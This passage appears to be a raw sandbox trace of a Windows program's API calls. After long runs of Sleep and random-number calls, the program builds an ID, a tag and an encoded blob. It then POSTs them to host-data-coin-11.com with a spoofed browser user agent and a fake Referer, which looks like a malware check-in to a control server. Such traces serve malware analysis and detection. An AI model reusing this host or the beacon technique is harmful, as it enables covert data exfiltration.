(dwMilliseconds=0x258) [0124.676] Sleep (dwMilliseconds=0x258) [0124.679] Sleep (dwMilliseconds=0x258) [0124.693] Sleep (dwMilliseconds=0x258) [0124.708] Sleep (dwMilliseconds=0x258) [0124.724] Sleep (dwMilliseconds=0x258) [0124.740] Sleep (dwMilliseconds=0x258) [0124.802] Sleep (dwMilliseconds=0x258) [0124.849] Sleep (dwMilliseconds=0x258) [0124.864] Sleep (dwMilliseconds=0x258) [0124.882] Sleep (dwMilliseconds=0x258) [0124.896] Sleep (dwMilliseconds=0x258) [0124.913] Sleep (dwMilliseconds=0x258) [0124.927] Sleep (dwMilliseconds=0x258) [0124.943] Sleep (dwMilliseconds=0x258) [0125.005] Sleep (dwMilliseconds=0x258) [0125.052] Sleep (dwMilliseconds=0x258) [0125.072] Sleep (dwMilliseconds=0x258) [0125.083] Sleep (dwMilliseconds=0x258) [0125.099] Sleep (dwMilliseconds=0x258) [0125.131] Sleep (dwMilliseconds=0x258) [0125.171] Sleep (dwMilliseconds=0x258) [0125.208] Sleep (dwMilliseconds=0x258) [0125.255] Sleep (dwMilliseconds=0x258) [0125.327] Sleep (dwMilliseconds=0x258) [0125.347] Sleep (dwMilliseconds=0x258) [0125.349] Sleep (dwMilliseconds=0x258) [0125.364] Sleep (dwMilliseconds=0x258) [0125.380] Sleep (dwMilliseconds=0x258) [0125.442] Sleep (dwMilliseconds=0x258) [0125.489] Sleep (dwMilliseconds=0x258) [0125.516] Sleep (dwMilliseconds=0x258) [0125.520] Sleep (dwMilliseconds=0x258) [0125.536] Sleep (dwMilliseconds=0x258) [0125.553] Sleep (dwMilliseconds=0x258) [0125.568] Sleep (dwMilliseconds=0x258) [0125.584] Sleep (dwMilliseconds=0x258) [0125.600] Sleep (dwMilliseconds=0x258) [0125.661] Sleep (dwMilliseconds=0x258) [0125.707] Sleep (dwMilliseconds=0x258) [0125.730] Sleep (dwMilliseconds=0x258) [0125.738] Sleep (dwMilliseconds=0x258) [0125.754] Sleep (dwMilliseconds=0x258) [0125.769] Sleep (dwMilliseconds=0x258) [0125.785] Sleep (dwMilliseconds=0x258) [0125.801] Sleep (dwMilliseconds=0x258) [0125.864] Sleep (dwMilliseconds=0x258) [0125.910] Sleep (dwMilliseconds=0x258) [0125.957] Sleep (dwMilliseconds=0x258) [0125.973] Sleep (dwMilliseconds=0x258) [0125.988] Sleep (dwMilliseconds=0x258) [0126.003] Sleep (dwMilliseconds=0x258) [0126.021] Sleep (dwMilliseconds=0x258) [0126.082] Sleep (dwMilliseconds=0x258) [0126.129] Sleep (dwMilliseconds=0x258) [0126.161] Sleep (dwMilliseconds=0x258) [0126.177] Sleep (dwMilliseconds=0x258) [0126.192] Sleep (dwMilliseconds=0x258) [0126.206] Sleep (dwMilliseconds=0x258) [0126.222] Sleep (dwMilliseconds=0x258) [0126.238] Sleep (dwMilliseconds=0x258) [0126.314] Sleep (dwMilliseconds=0x258) [0126.347] Sleep (dwMilliseconds=0x258) [0126.390] Sleep (dwMilliseconds=0x258) [0126.393] Sleep (dwMilliseconds=0x258) [0126.409] Sleep (dwMilliseconds=0x258) [0126.425] Sleep (dwMilliseconds=0x258) [0126.440] Sleep (dwMilliseconds=0x258) [0126.502] Sleep (dwMilliseconds=0x258) [0126.550] Sleep (dwMilliseconds=0x258) [0126.574] Sleep (dwMilliseconds=0x258) [0126.580] Sleep (dwMilliseconds=0x258) [0126.596] Sleep (dwMilliseconds=0x258) [0126.612] Sleep (dwMilliseconds=0x258) [0126.628] Sleep (dwMilliseconds=0x258) [0126.644] Sleep (dwMilliseconds=0x258) [0126.705] Sleep (dwMilliseconds=0x258) [0126.771] Sleep (dwMilliseconds=0x258) [0126.791] Sleep (dwMilliseconds=0x258) [0126.799] Sleep (dwMilliseconds=0x258) [0126.815] Sleep (dwMilliseconds=0x258) [0126.830] Sleep (dwMilliseconds=0x258) [0126.846] Sleep (dwMilliseconds=0x258) [0126.862] Sleep (dwMilliseconds=0x258) [0126.923] Sleep (dwMilliseconds=0x258) [0126.970] Sleep (dwMilliseconds=0x258) [0127.012] Sleep (dwMilliseconds=0x258) [0127.017] Sleep (dwMilliseconds=0x258) [0127.033] Sleep (dwMilliseconds=0x258) [0127.050] Sleep (dwMilliseconds=0x258) [0127.064] Sleep (dwMilliseconds=0x258) [0127.080] Sleep (dwMilliseconds=0x258) [0127.142] Sleep (dwMilliseconds=0x258) [0127.189] Sleep (dwMilliseconds=0x258) [0127.223] Sleep (dwMilliseconds=0x258) [0127.237] Sleep (dwMilliseconds=0x258) [0127.252] Sleep (dwMilliseconds=0x258) [0127.267] Sleep (dwMilliseconds=0x258) [0127.282] Sleep (dwMilliseconds=0x258) [0127.314] Sleep (dwMilliseconds=0x258) [0127.360] Sleep (dwMilliseconds=0x258) [0127.407] Sleep (dwMilliseconds=0x258) [0127.445] Sleep (dwMilliseconds=0x258) [0127.454] Sleep (dwMilliseconds=0x258) [0127.470] Sleep (dwMilliseconds=0x258) [0127.485] Sleep (dwMilliseconds=0x258) [0127.501] Sleep (dwMilliseconds=0x258) [0127.516] Sleep (dwMilliseconds=0x258) [0127.579] Sleep (dwMilliseconds=0x258) [0127.638] Sleep (dwMilliseconds=0x258) [0127.655] Sleep (dwMilliseconds=0x258) [0127.657] Sleep (dwMilliseconds=0x258) [0127.673] Sleep (dwMilliseconds=0x258) [0127.688] Sleep (dwMilliseconds=0x258) [0127.704] Sleep (dwMilliseconds=0x258) [0127.720] Sleep (dwMilliseconds=0x258) [0127.781] Sleep (dwMilliseconds=0x258) [0127.829] Sleep (dwMilliseconds=0x258) [0127.868] Sleep (dwMilliseconds=0x258) [0127.875] Sleep (dwMilliseconds=0x258) [0127.891] Sleep (dwMilliseconds=0x258) [0127.906] Sleep (dwMilliseconds=0x258) [0127.922] Sleep (dwMilliseconds=0x258) [0127.938] Sleep (dwMilliseconds=0x258) [0128.001] Sleep (dwMilliseconds=0x258) [0128.047] Sleep (dwMilliseconds=0x258) [0128.089] Sleep (dwMilliseconds=0x258) [0128.094] Sleep (dwMilliseconds=0x258) [0128.110] Sleep (dwMilliseconds=0x258) [0128.125] Sleep (dwMilliseconds=0x258) [0128.141] Sleep (dwMilliseconds=0x258) [0128.156] Sleep (dwMilliseconds=0x258) [0128.219] Sleep (dwMilliseconds=0x258) [0128.265] Sleep (dwMilliseconds=0x258) [0128.283] Sleep (dwMilliseconds=0x258) [0128.307] Sleep (dwMilliseconds=0x258) [0128.312] Sleep (dwMilliseconds=0x258) [0128.329] Sleep (dwMilliseconds=0x258) [0128.343] Sleep (dwMilliseconds=0x258) [0128.359] Sleep (dwMilliseconds=0x258) [0128.421] Sleep (dwMilliseconds=0x258) [0128.468] Sleep (dwMilliseconds=0x258) [0128.492] Sleep (dwMilliseconds=0x258) [0128.504] Sleep (dwMilliseconds=0x258) [0128.516] Sleep (dwMilliseconds=0x258) [0128.530] Sleep (dwMilliseconds=0x258) [0128.547] Sleep (dwMilliseconds=0x258) [0128.562] Sleep (dwMilliseconds=0x258) [0128.624] Sleep (dwMilliseconds=0x258) [0128.672] Sleep (dwMilliseconds=0x258) [0128.696] Sleep (dwMilliseconds=0x258) [0128.702] Sleep (dwMilliseconds=0x258) [0128.718] Sleep (dwMilliseconds=0x258) [0128.734] Sleep (dwMilliseconds=0x258) [0128.749] Sleep (dwMilliseconds=0x258) [0128.765] Sleep (dwMilliseconds=0x258) [0128.781] Sleep (dwMilliseconds=0x258) [0128.842] Sleep (dwMilliseconds=0x258) [0128.890] Sleep (dwMilliseconds=0x258) [0128.914] Sleep (dwMilliseconds=0x258) [0128.920] Sleep (dwMilliseconds=0x258) [0128.936] Sleep (dwMilliseconds=0x258) [0128.952] Sleep (dwMilliseconds=0x258) [0128.967] Sleep (dwMilliseconds=0x258) [0128.983] Sleep (dwMilliseconds=0x258) [0129.045] Sleep (dwMilliseconds=0x258) [0129.093] Sleep (dwMilliseconds=0x258) [0129.118] Sleep (dwMilliseconds=0x258) [0129.123] Sleep (dwMilliseconds=0x258) [0129.139] Sleep (dwMilliseconds=0x258) [0129.155] Sleep (dwMilliseconds=0x258) [0129.172] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x26) returned 0x7f52300 [0129.172] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\estugfj"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0129.174] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7310768d [0129.175] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x91) returned 0x7f52350 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x50d02669 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x16e7e484 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5280f4cd [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d9d6208 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x18c27088 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1e2248f7 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2d2047e [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x51d0c8b2 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3d67ea10 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1b0fcf2e [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2faff2b6 [0129.175] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x70bbb29a [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x527f088d [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5e883aec [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x67dfc64b [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2f1cbff0 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xeff34e [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x301853c0 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x26e2258c [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1d5932f7 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x612590c9 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a935c98 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x215d7ee9 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1ef8d5f1 [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x55cbc17c [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4770a1ac [0129.176] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x543e65c8 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2992e336 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6d4b5f2c [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7d7d3b45 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x51ec0134 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2881a891 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3c4b4111 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x276d135d [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5ddd392b [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x707a19a9 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x45bc4f11 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1193b33 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6c12d8fa [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3213ddb3 [0129.177] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x50b34e9c [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2c2c8a15 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x44195be6 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1fb12614 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xb9ad8e1 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x330bce21 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x15d24c4c [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b35d840 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x72ea74af [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x14c0bbd1 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4e0ebef0 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x24c6cc82 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5255a404 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xc5f9280 [0129.178] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x169dcffa [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4011dea7 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x42b56c89 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3025b60b [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7310768d [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x536478c0 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6a21730f [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x32eec94e [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6fbc1111 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x21c94f5 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x64de4a43 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5eca0375 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4a53895 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3720d334 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x11cdb37b [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x12889d7 [0129.179] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7e180d34 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4a3f6e64 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x8267ab3 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x611ba09b [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7157b2aa [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6b1b480 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x24e64f90 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3dbf514 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1122631c [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x27d9b50a [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x13ac05f2 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xe113353 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7f9bbb6d [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x148d443f [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2f857397 [0129.180] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x139cd7a8 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5accb063 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x50f88db4 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1c34359c [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x68dd5e95 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4aa9ac81 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3ac90b08 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x246a979b [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x25a0eef1 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x285b6524 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xcecf2fa [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x685ec6ff [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x774e781a [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1ae048a5 [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x331165ce [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x23a3926c [0129.181] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1e82d9be [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x63eef08a [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xa00666f [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x613b28fa [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xe0b2ffe [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x6a8ca260 [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x23b9eb16 [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x28f56e1b [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x27602ef7 [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1a3e3942 [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1401281 [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a9a6926 [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3f89611b [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7f4fc5fe [0129.182] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1c775921 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5616705a [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7a14a1a1 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3b3cb260 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xb28d7cf [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2f692d9 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xedfe15a [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x324896b3 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x697eb2b1 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4b9507c9 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x206f593b [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3b301731 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4bf8cbf4 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xef2f981 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1fbb3c9d [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1305296 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x59fd8689 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x382bb999 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x77ac64ff [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x726c1963 [0129.183] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x1ebe41d8 [0129.183] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0xe0) returned 0x7f523f0 [0129.183] lstrcatA (in: lpString1="", lpString2="4BCD659AD8F347B5B451918CD891C8238443A5AF" | out: lpString1="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned="4BCD659AD8F347B5B451918CD891C8238443A5AF" [0129.183] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0129.183] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0129.183] lstrcatA (in: lpString1="", lpString2=",=zKmt-79gOOjk>wS#EXzoDxq'K3e`gn(DHtV@UR=(WYr@)5fVK=Scc&Ztl]>K``jh>S\\`5#n4GwWU[K30VFJoz%%LReL\"=5r=d]Ai+LYYuK2V1Pkf-zI\\3VJi\"@xr\\SpNw.2^^E" | out: lpString1=",=zKmt-79gOOjk>wS#EXzoDxq'K3e`gn(DHtV@UR=(WYr@)5fVK=Scc&Ztl]>K``jh>S\\`5#n4GwWU[K30VFJoz%%LReL\"=5r=d]Ai+LYYuK2V1Pkf-zI\\3VJi\"@xr\\SpNw.2^^E") returned=",=zKmt-79gOOjk>wS#EXzoDxq'K3e`gn(DHtV@UR=(WYr@)5fVK=Scc&Ztl]>K``jh>S\\`5#n4GwWU[K30VFJoz%%LReL\"=5r=d]Ai+LYYuK2V1Pkf-zI\\3VJi\"@xr\\SpNw.2^^E" [0129.183] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10c) returned 0x7f524e0 [0129.183] lstrlenA (lpString="http://host-data-coin-11.com/") returned 29 [0129.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f52300, cbMultiByte=30, lpWideCharStr=0x7f524e0, cchWideChar=60 | out: lpWideCharStr="http://host-data-coin-11.com/") returned 30 [0129.184] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x6e6fbf8 | out: pProxyConfig=0x6e6fbf8) returned 1 [0129.203] WinHttpOpen (pszAgentW="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x3faf720 [0129.204] WinHttpCrackUrl (in: pwszUrl="http://host-data-coin-11.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x6e6fcb0 | out: lpUrlComponents=0x6e6fcb0) returned 1 [0129.204] WinHttpConnect (hSession=0x3faf720, pswzServerName="host-data-coin-11.com", nServerPort=0x50, dwReserved=0x0) returned 0x3f83a90 [0129.204] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52600 [0129.204] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x68) returned 0x7f52620 [0129.205] WinHttpOpenRequest (hConnect=0x3f83a90, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x7149a30 [0129.205] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x4e) returned 0x7f52690 [0129.205] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10d) returned 0x7f526f0 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x4e860910 [0129.205] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f52810 [0129.205] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x17) returned 0x7f52830 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2c943616 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x23debf07 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x5d7d1b11 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x3f51e334 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x59ad94ad [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x20f69ab6 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0xdd9aed9 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x2b6d194a [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7636cb34 [0129.205] RtlRandomEx (in: Seed=0x3900e9e | out: Seed=0x3900e9e) returned 0x7fb02fd2 [0129.205] wsprintfW (in: param_1=0x7f526f0, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://frnnyglck.com/") returned 43 [0129.205] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52830) returned 0x17 [0129.205] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52830) returned 1 [0129.205] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52810) returned 0x12 [0129.205] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52810) returned 1 [0129.205] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f52690) returned 0x4e [0129.206] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f52690) returned 1 [0129.206] WinHttpAddRequestHeaders (hRequest=0x7149a30, pwszHeaders="Accept: */*\r\nReferer: http://frnnyglck.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0129.206] WinHttpSendRequest (hRequest=0x7149a30, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x7f523f0*, dwOptionalLength=0xd7, dwTotalLength=0xd7, dwContext=0x0) returned 1 [0129.473] WinHttpReceiveResponse (hRequest=0x7149a30, lpReserved=0x0) returned 1 [0129.474] RtlAllocateHeap 